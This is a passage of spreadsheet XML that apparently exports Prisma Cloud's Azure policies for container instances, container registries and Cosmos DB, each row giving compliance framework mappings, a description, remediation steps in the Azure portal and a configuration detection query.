          <t>Environment variables can only be configured with secure values at the time of container instance creation. It is not possible to modify environment variables once instance is created. Hence, it is suggested to delete an existing container instance having not configured with secure values and create a new container instance having required environment variables configured with secure values.
Note: Backup or migrate data from the container instance before deleting it.
To create a container instance with environment variables with secure value property; follow below URL:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-environment-variables#secure-values
To delete a reported container instance; follow below URL:
https://docs.microsoft.com/en-us/azure/container-instances/container-instances-quickstart-portal#clean-up-resources 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-235
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-235</t>
        </is>
      </c>
      <c r="Y2238" t="inlineStr"/>
      <c r="Z2238" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-container-instances-container-group' AND json.rule = properties.provisioningState equals Succeeded and properties.containers[*].properties.environmentVariables[*] exists and properties.containers[*].properties.environmentVariables[*].value exists
{"category":"General","resourceTypes":["azurerm_container_group"]}</t>
        </is>
      </c>
      <c r="AA2238" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2238" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2238" t="inlineStr">
        <is>
          <t>PC-AZR-ACI-796-CKV_AZURE_235</t>
        </is>
      </c>
      <c r="AD2238" t="b">
        <v>1</v>
      </c>
      <c r="AE2238" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2238" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>743e8910-6a4c-466c-8ba2-d9c207a5efe6</t>
        </is>
      </c>
      <c r="AI2238" t="inlineStr">
        <is>
          <t>e82c581e-41af-46a9-a708-c5a2c3935c02</t>
        </is>
      </c>
      <c r="AJ2238" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2238" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2239">
      <c r="A2239" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO 27002:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v10.0 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, Matt's ATT&amp;ACK, Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, MLPS 2.0 (Level 2), CIS Controls v8, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Australian Energy Sector Cyber Security Framework (AESCSF), ISO 27002:2022, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2239" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2239" s="2" t="inlineStr"/>
      <c r="D2239" t="inlineStr"/>
      <c r="E2239" t="inlineStr"/>
      <c r="F2239" t="inlineStr"/>
      <c r="G2239" t="b">
        <v>0</v>
      </c>
      <c r="H22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39" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2239" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="K2239" t="inlineStr">
        <is>
          <t>Azure Container registries Public access to All networks is enabled</t>
        </is>
      </c>
      <c r="L2239" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2239" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2239" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2239" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2239" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2239" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2239" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2239" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Policy Status Review</t>
        </is>
      </c>
      <c r="T2239" t="b">
        <v>0</v>
      </c>
      <c r="U2239" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2239" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="W2239" t="inlineStr">
        <is>
          <t>This policy identifies Azure Container registries which has Public access to All networks enabled. Azure ACR is used to store Docker container images which might contain sensitive information. It is highly recommended to restrict public access from allow access from Selected networks or make it Private by disabling the Public access.</t>
        </is>
      </c>
      <c r="X2239" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'All services' &gt; 'Container Registries'
3. Select the container registry you need to modify
4. Select 'Networking' under 'Settings'
5. Click on 'Public access' tab and select 'Selected networks' and provide the IPV4 address for which you want access to ACR or select 'Disabled' to disable Public access
6. Click on 'Save'
Note: 'Public access' setting can be toggled to 'Selected networks' or 'Disabled' state only with Premium SKU. For Standard and Basic SKU Public access setting cannot be updated and these resource will reamin accesiable to public. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-acr-is-set-to-disable-public-networking</t>
        </is>
      </c>
      <c r="Y2239" t="inlineStr"/>
      <c r="Z2239" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-container-registry' AND json.rule = ((properties.publicNetworkAccess equals Enabled and properties.networkRuleSet does not exist) or (properties.publicNetworkAccess equals Enabled and properties.networkRuleSet exists and properties.networkRuleSet.defaultAction equals Allow))
{"category":"Networking","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA2239" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2239" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:54</t>
        </is>
      </c>
      <c r="AC2239" t="inlineStr">
        <is>
          <t>PC-AZR-ACR-683-CKV_AZURE_139</t>
        </is>
      </c>
      <c r="AD2239" t="b">
        <v>1</v>
      </c>
      <c r="AE2239" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2239" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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39" t="inlineStr">
        <is>
          <t>d283949a-7a91-4cc6-883c-944013c38202</t>
        </is>
      </c>
      <c r="AI2239" t="inlineStr">
        <is>
          <t>b16fd635-a38f-4525-a4e0-ae3e01415095</t>
        </is>
      </c>
      <c r="AJ2239" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2239" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2240">
      <c r="A2240" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Matt's ATT&amp;ACK, TX-RAMP Level 1, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 2, PCI DSS v3.2.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8.1, ISO/IEC 27002:2013, ITSG-33, MITRE ATT&amp;CK v10.0 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), NIST SP 800-172, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2240" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2240" s="2" t="inlineStr"/>
      <c r="D2240" t="inlineStr"/>
      <c r="E2240" t="inlineStr"/>
      <c r="F2240" t="inlineStr"/>
      <c r="G2240" t="b">
        <v>1</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2240" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="K2240" t="inlineStr">
        <is>
          <t>Azure Container Registry using the deprecated classic registry</t>
        </is>
      </c>
      <c r="L2240" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2240" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2240" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2240" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2240" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2240" t="inlineStr">
        <is>
          <t>14</t>
        </is>
      </c>
      <c r="R2240" t="inlineStr">
        <is>
          <t>14.1</t>
        </is>
      </c>
      <c r="S2240" t="inlineStr"/>
      <c r="T2240" t="b">
        <v>0</v>
      </c>
      <c r="U2240" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2240" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="W2240" t="inlineStr">
        <is>
          <t>This policy identifies an Azure Container Registry (ACR) that is using the classic SKU. The initial release of the Azure Container Registry (ACR) service that was offered as a classic SKU is being deprecated and will be unavailable after April 2019. As a best practice, upgrade your existing classic registry to a managed registry.
For more information, visit https://docs.microsoft.com/en-us/azure/container-registry/container-registry-upgrade</t>
        </is>
      </c>
      <c r="X2240" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal.
2. Select 'All services' &gt; 'Container Registries'
3. Select the container registry you need to modify.
4. Select 'Upgrade to managed registry'.
5. Select 'OK' to confirm the upgrade.</t>
        </is>
      </c>
      <c r="Y2240" t="inlineStr"/>
      <c r="Z2240" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-container-registry' AND json.rule =  skuName contains "Classic"</t>
        </is>
      </c>
      <c r="AA2240" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2240" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2240" t="inlineStr">
        <is>
          <t>PC-AZR-ACR-356</t>
        </is>
      </c>
      <c r="AD2240" t="b">
        <v>1</v>
      </c>
      <c r="AE2240" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2240" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>a37e0e71-052d-42aa-b5e3-ab21d4043965</t>
        </is>
      </c>
      <c r="AI2240" t="inlineStr">
        <is>
          <t>ac2b4e70-545e-403f-810d-4be77c2269c8</t>
        </is>
      </c>
      <c r="AJ2240" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2240" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2241">
      <c r="A2241" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, ISO/IEC 27018:2019, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CRI Profile v2.0, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, CIS Controls v8, CyberSecurity Law of the People's Republic of China, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2241" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2241" s="2" t="inlineStr"/>
      <c r="D2241" t="inlineStr"/>
      <c r="E2241" t="inlineStr"/>
      <c r="F2241" t="inlineStr"/>
      <c r="G2241" t="b">
        <v>1</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2241" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="K2241" t="inlineStr">
        <is>
          <t>Azure ACR HTTPS not enabled for webhook</t>
        </is>
      </c>
      <c r="L2241" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2241" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2241" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2241" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2241" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2241" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2241" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2241" t="inlineStr"/>
      <c r="T2241" t="b">
        <v>0</v>
      </c>
      <c r="U2241" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2241" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="W2241" t="inlineStr">
        <is>
          <t>Ensure you send container registry webhooks only to a HTTPS endpoint. This policy checks your container registry webhooks and alerts if it finds a URI with HTTP.</t>
        </is>
      </c>
      <c r="X2241" t="inlineStr">
        <is>
          <t>Update your container registry webhook URI to use HTTPS.
1. Sign in to the Azure portal.
2. Navigate to the container registry in which you want to modify the webhook.
3. Under Services, select Webhooks.
4. Select your existing webhook.
5. Near the top of the next window pane, select Configure.
6. Under Service URI in the next window, modify your URI to use https:// and click Save. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-28
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-28</t>
        </is>
      </c>
      <c r="Y2241" t="inlineStr"/>
      <c r="Z2241" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-container-registry' AND json.rule = 'webhooks[*] contains config and webhooks[*].config.serviceUri starts with http://'
{"category":"General","resourceTypes":["azurerm_container_group"]}</t>
        </is>
      </c>
      <c r="AA2241" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2241" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2241" t="inlineStr">
        <is>
          <t>PC-AZR-ACR-389-CKV2_AZURE_28</t>
        </is>
      </c>
      <c r="AD2241" t="b">
        <v>1</v>
      </c>
      <c r="AE2241" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2241" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>9a28b0fb-67cd-4de9-80b0-702bc0ca6177</t>
        </is>
      </c>
      <c r="AI2241" t="inlineStr">
        <is>
          <t>5290ede6-4164-467d-9e3a-f55f23593765</t>
        </is>
      </c>
      <c r="AJ2241" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2241" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2242">
      <c r="A2242" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Insurance Regulatory And Development Authority Of India, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, NIST CSF, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2242" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2242" s="2" t="inlineStr"/>
      <c r="D2242" t="inlineStr"/>
      <c r="E2242" t="inlineStr"/>
      <c r="F2242" t="inlineStr"/>
      <c r="G2242" t="b">
        <v>0</v>
      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2242" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="K2242" t="inlineStr">
        <is>
          <t>Azure Container Registry does not use a dedicated resource group</t>
        </is>
      </c>
      <c r="L2242" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2242" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2242" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2242" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2242" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2242" t="inlineStr">
        <is>
          <t>14</t>
        </is>
      </c>
      <c r="R2242" t="inlineStr">
        <is>
          <t>14.1</t>
        </is>
      </c>
      <c r="S2242" t="inlineStr"/>
      <c r="T2242" t="b">
        <v>0</v>
      </c>
      <c r="U2242" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2242" t="inlineStr">
        <is>
          <t>azure-container-registry</t>
        </is>
      </c>
      <c r="W2242" t="inlineStr">
        <is>
          <t>Placing your Azure Container Registry (ACR) in a dedicated Azure resource group, allows you to minimize the risk of accidentally deleting the collection of images in the registry when you delete the container instance resource group.
This policy identifies ACRs that reside in resource groups that contains non-ACR resources. For more information about ACR best practices, visit https://docs.microsoft.com/en-us/azure/container-registry/container-registry-best-practices</t>
        </is>
      </c>
      <c r="X2242" t="inlineStr">
        <is>
          <t>To remediate this alert, move all non-ACR resources to another resource group. To move resources to another resource group follow below URL:
https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/move-resource-group-and-subscription</t>
        </is>
      </c>
      <c r="Y2242" t="inlineStr"/>
      <c r="Z2242" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type='azure' and api.name= 'azure-container-registry'   as X; config from cloud.resource where api.name = 'azure-resource-group' as Y; filter ' $.X.resourceGroupName equals $.Y.name and $.Y.isDedicatedContainerRegistryGroup is false' ; show X;</t>
        </is>
      </c>
      <c r="AA2242" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2242" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2242" t="inlineStr">
        <is>
          <t>PC-AZR-ACR-357</t>
        </is>
      </c>
      <c r="AD2242" t="b">
        <v>1</v>
      </c>
      <c r="AE2242" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2242" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>dba41206-2374-4215-b812-a2fcf811e8e7</t>
        </is>
      </c>
      <c r="AI2242" t="inlineStr">
        <is>
          <t>c378030b-3441-455f-852c-b21bcb309373</t>
        </is>
      </c>
      <c r="AJ2242" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2242" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2243">
      <c r="A2243" t="inlineStr">
        <is>
          <t>APRA (CPS 234) Information Security</t>
        </is>
      </c>
      <c r="B2243" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2243" s="2" t="inlineStr"/>
      <c r="D2243" t="inlineStr"/>
      <c r="E2243" t="inlineStr"/>
      <c r="F2243" t="inlineStr"/>
      <c r="G2243" t="b">
        <v>1</v>
      </c>
      <c r="H22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43" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2243" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="K2243" t="inlineStr">
        <is>
          <t>crap2</t>
        </is>
      </c>
      <c r="L2243" t="inlineStr"/>
      <c r="M2243" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2243" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2243" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2243" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2243" t="inlineStr">
        <is>
          <t>Roles and responsibilities</t>
        </is>
      </c>
      <c r="R2243" t="inlineStr">
        <is>
          <t>CPS234-13</t>
        </is>
      </c>
      <c r="S2243" t="inlineStr"/>
      <c r="T2243" t="b">
        <v>0</v>
      </c>
      <c r="U2243" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2243" t="inlineStr">
        <is>
          <t>azure-cosmos-db</t>
        </is>
      </c>
      <c r="W2243" t="inlineStr">
        <is>
          <t>crap2</t>
        </is>
      </c>
      <c r="X2243" t="inlineStr"/>
      <c r="Y2243" t="inlineStr"/>
      <c r="Z2243" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cosmos-db' AND json.rule = properties.provisioningState equals Succeeded and properties.ipRangeFilter is not empty and properties.ipRangeFilter startsWith 0.0.0.0 or properties.ipRangeFilter endsWith 0.0.0.0</t>
        </is>
      </c>
      <c r="AA2243" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2243" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2243" t="inlineStr"/>
      <c r="AD2243" t="b">
        <v>0</v>
      </c>
      <c r="AE2243" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2243" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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43" t="inlineStr">
        <is>
          <t>208f67bb-94bf-41ae-9052-638f8195bad4</t>
        </is>
      </c>
      <c r="AI2243" t="inlineStr">
        <is>
          <t>d5cbf099-d1e5-4be3-87c6-7637538bf672</t>
        </is>
      </c>
      <c r="AJ2243" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2243" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2244">
      <c r="A2244" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS v2.1.0 (Azure) Level 2, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, kfirdaus AWS Account-CS, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CIS v2.0.0 (Azure) Level 2, CIS Controls v8.1, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CIS Controls v7.1, kfirdaus AWS Account-CS, Copy of New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2244" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2244" s="2" t="inlineStr"/>
